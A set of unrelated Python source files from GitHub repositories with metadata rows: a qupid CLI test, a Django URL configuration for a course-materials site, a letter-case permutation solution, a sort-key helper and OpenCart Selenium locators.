    no_asd_str = "I do not have this condition"
    background = metadata[metadata["asd"] == no_asd_str]
    focus = metadata[metadata["asd"] == asd_str]
    bg_file = "background.tsv"
    focus_file = "focus.tsv"
    match_file = "match.tsv"
    # isolated_filesystem gives a throwaway cwd for the input/output files.
    with runner.isolated_filesystem():
        background.to_csv(bg_file, sep="\t", index=True)
        focus.to_csv(focus_file, sep="\t", index=True)
        result = runner.invoke(qupid, [
            "shuffle",
            "-f", focus_file,
            "-b", bg_file,
            "-i", 15,
            "-dc", "sex",
            "-nc", "age_years", 10,
            "-o", match_file
        ])
        assert result.exit_code == 0
        assert os.path.exists(match_file)
        # 45 focus samples x 15 iterations.
        df = pd.read_table(match_file, sep="\t", index_col=0)
        assert df.shape == (45, 15)
| gibsramen/qupid | qupid/tests/test_cli.py | test_cli.py | py | 1,257 | python | en | code | 11 | github-code | 50 |
21037477056 | """SansaCloud URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/4.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from SansaCloud.views import *
from Foro.views import *
urlpatterns = [
path('admin/', admin.site.urls),
path('registro.html', register),
path('login.html', custom_login),
path('logout.html', custom_logout),
path('test.html', test),
path('foro.html',foro,name='foro'),
path('addInForum.html',addInForum,name='addInForum'),
path('addInDiscussion.html',addInDiscussion,name='addInDiscussion'),
path('home.html', home, name="homepage"),
path('carreras.html', carreras),
path('ramos.html', ramos),
path('mat021.html', mat021),
path('iwi131.html', iwi131),
path('IngenieriaCivilInformatica.html', ingCivilInf),
path('mat021.html', mat021),
path('Notas Semestrales.pdf', notasSemestrales),
path('Certamen1-2014-1.pdf', c120141),
path('Certamen1-2014-2.pdf', c120142),
path('Certamen1-2015-1.pdf', c120151),
path('Certamen2-2015-2.pdf', c220152),
path('Certamen3-2014-2.pdf', c320142),
path('CertamenGlobalMat021.pdf', cgmat021),
path('Control1-2015-1.pdf', co120151),
path('Ejercicios de Inducción.pdf', ejerciciosInduccion),
path('Guía de Sumatorias y Progresiones.pdf', guiaSumyPro),
path('PautaTallerC2-1.pdf', pautaTallerC2),
path('Taller 1 Dasarrollado.pdf', Taller1Mat021),
path('Taller 2 Desarrollado.pdf', Taller2Mat021),
path('hrw130.html', hrw130),
path('fis100.html', fis100),
path('Resumen.pdf', ResumenHrw130),
path('Taller 1 Hrw130.pdf', Taller1Etica),
path('UVA1.pdf', UVA1),
path('UVA9.pdf', UVA9),
]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | SeniorZas/UniProjects | Uni Projects/SansaCloud-master/SansaCloud-master/SansaCloud/urls.py | urls.py | py | 2,384 | python | en | code | 0 | github-code | 50 |
33862856363 | # using recursion -> backtacking
# time complexity: O(n^2)
# space complexity: O(n)
class Solution:
    def letterCasePermutation(self, S: str) -> list[str]:
        """Return every string obtainable from S by toggling letter case.

        Non-alphabetic characters keep their single form; each letter
        branches into its lower- then upper-case variant, so results come
        back in that deterministic order.

        Fix: the annotation previously used `List[str]` without importing
        typing, which raised NameError when the class body executed;
        builtin generics (`list[str]`, Python 3.9+) need no import.

        Time:  O(2^L * L) for L letters. Space: O(L) recursion depth.
        """
        res = []
        def dfs(i, path):
            # All characters consumed: `path` is one complete variant.
            if i == len(S):
                res.append(path)
                return
            if S[i].isalpha():
                # Branch on both cases, lower-case first.
                dfs(i+1, path + S[i].lower())
                dfs(i+1, path + S[i].upper())
            else:
                dfs(i+1, path + S[i])
        dfs(0, '')
        return res
| mykoabe/Competetive-Programming | PostCampProgress/Week1/5_letter_case_permutation.py | 5_letter_case_permutation.py | py | 509 | python | en | code | 1 | github-code | 50 |
41024672008 | """This module contains a helper for getting the sorting arguements figured
out"""
def get_sort_keys(given, allowed):
    """Normalize user-supplied sort fields into Mongo-style sort keys.

    Each entry in `given` may be prefixed with '+' (or the ' ' that URL
    decoding turns '+' into) for ascending, or '-' for descending.
    Entries not in `allowed` are silently dropped.

    Fix: empty strings (and bare prefix characters) no longer raise
    IndexError — they are skipped like any other disallowed key.

    Returns a list of '+field' / '-field' strings.
    """
    keys = []
    for key in given:
        asc = True
        # '+' often arrives as ' ' after URL decoding; both mean ascending.
        if key and key[0] in (' ', '+'):
            key = key[1:]
        if key and key[0] == '-':
            asc = False
            key = key[1:]
        if key in allowed:
            keys.append('{}{}'.format('+' if asc else '-', key))
    return keys
| raghavach/beerAPI_raghu | beerpi/sort.py | sort.py | py | 543 | python | en | code | 0 | github-code | 50 |
7566053894 | class Catalog:
class Products:
products = {'css': '.product-layout'}
product_image = {'css': products['css'] + ' .image'}
product_name = {'css': products['css'] + ' .caption h4'}
class Buttons:
button_group = {'css': '.button-group'}
add_to_cart_button = {'css': button_group['css'] + ' [class="fa fa-shopping-cart"]'}
add_to_wish_list_button = {'css': button_group['css'] + ' [class="fa fa-heart"]'}
compare_product_button = {'css': button_group['css'] + '[class="fa fa-exchange"]'}
    class Navigation:
        # Grid/list view toggle buttons above the product listing.
        list_view = {'css': '[data-original-title="List"]'}
        grid_view = {'css': '[data-original-title="Grid"]'}
    class Sort:
        # "Sort By" dropdown locator and its visible option labels.
        options = {'css': '#input-sort'}
        by_name_A_Z = "Name (A - Z)"
        by_name_Z_A = "Name (Z - A)"
        by_price_low_high = "Price (Low > High)"
        by_price_high_low = "Price (High > Low)"
        # NOTE(review): "raiting" is a misspelling of "rating"; left as-is
        # because renaming the attributes would break existing test code.
        by_raiting_highest = "Rating (Highest)"
        by_raiting_lowest = "Rating (Lowest)"
        by_model_A_Z = "Model (A - Z)"
        by_model_Z_A = "Model (Z - A)"
class Limits:
options = {'css': '#input-limit'}
limit_15 = "15"
limit_25 = "25"
limit_50 = "50"
limit_75 = "70"
limit100 = "100" | maslovaleksandr/opencart_tests | locators/Catalog.py | Catalog.py | py | 1,284 | python | en | code | 0 | github-code | 50 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.